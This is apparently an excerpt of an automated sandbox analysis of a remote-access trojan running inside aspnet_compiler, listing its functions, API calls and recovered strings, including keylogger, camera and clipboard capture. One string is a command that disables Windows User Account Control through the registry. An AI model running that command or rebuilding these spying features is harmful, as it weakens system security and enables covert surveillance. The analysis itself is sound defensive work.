                                                                          • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16
                                                                          • String ID: a/p$am/pm
                                                                          • API String ID: 3509577899-3206640213
                                                                          • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                          • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                          • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                          • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                            • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologSleep
                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                          • API String ID: 3469354165-462540288
                                                                          • Opcode ID: 37a605f6fc1509c022d5344fe3f73bddb8cf724610274ffecc6b5ec626bfb4aa
                                                                          • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                          • Opcode Fuzzy Hash: 37a605f6fc1509c022d5344fe3f73bddb8cf724610274ffecc6b5ec626bfb4aa
                                                                          • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                          • String ID:
                                                                          • API String ID: 493672254-0
                                                                          • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                          • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                          • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                          • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                          • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                          • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                          • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                          • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                          • _free.LIBCMT ref: 00446EF6
                                                                          • _free.LIBCMT ref: 00446F1E
                                                                          • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                          • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                          • _abort.LIBCMT ref: 00446F3D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$_free$_abort
                                                                          • String ID:
                                                                          • API String ID: 3160817290-0
                                                                          • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                          • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                          • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                          • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                          • String ID:
                                                                          • API String ID: 221034970-0
                                                                          • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                          • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                          • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                          • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                          • String ID:
                                                                          • API String ID: 221034970-0
                                                                          • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                          • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                          • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                          • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                          • String ID:
                                                                          • API String ID: 221034970-0
                                                                          • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                          • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                          • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                          • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                          APIs
                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Enum$InfoQueryValue
                                                                          • String ID: [regsplt]$DG
                                                                          • API String ID: 3554306468-1089238109
                                                                          • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                          • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                          • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                          • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                          APIs
                                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                          • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                          • API String ID: 2974294136-753205382
                                                                          • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                          • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                          • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                          • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                          • wsprintfW.USER32 ref: 0040A905
                                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: EventLocalTimewsprintf
                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                          • API String ID: 1497725170-248792730
                                                                          • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                                          • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                          • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                                          • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                          • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                                          • String ID: `AG
                                                                          • API String ID: 1958988193-3058481221
                                                                          • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                          • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                          • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                          • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                          APIs
                                                                          • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                          • GetLastError.KERNEL32 ref: 0041CA91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                          • String ID: 0$MsgWindowClass
                                                                          • API String ID: 2877667751-2410386613
                                                                          • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                          • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                          • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                          • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                          • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                          • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                          Strings
                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                          • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$CreateProcess
                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                          • API String ID: 2922976086-4183131282
                                                                          • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                          • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                          • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                          • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                          • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                          • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                          • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                          • String ID: KeepAlive | Disabled
                                                                          • API String ID: 2993684571-305739064
                                                                          • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                          • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                          • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                          • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                          APIs
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                          • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                          • String ID: Alarm triggered
                                                                          • API String ID: 614609389-2816303416
                                                                          • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                                          • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                          • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                                          • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                          Strings
                                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                          • API String ID: 3024135584-2418719853
                                                                          • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                          • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                          • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                          • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                          • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                          • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                          • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                          APIs
                                                                            • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                          • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                          • String ID:
                                                                          • API String ID: 3525466593-0
                                                                          • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                          • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                          • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                          • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                          APIs
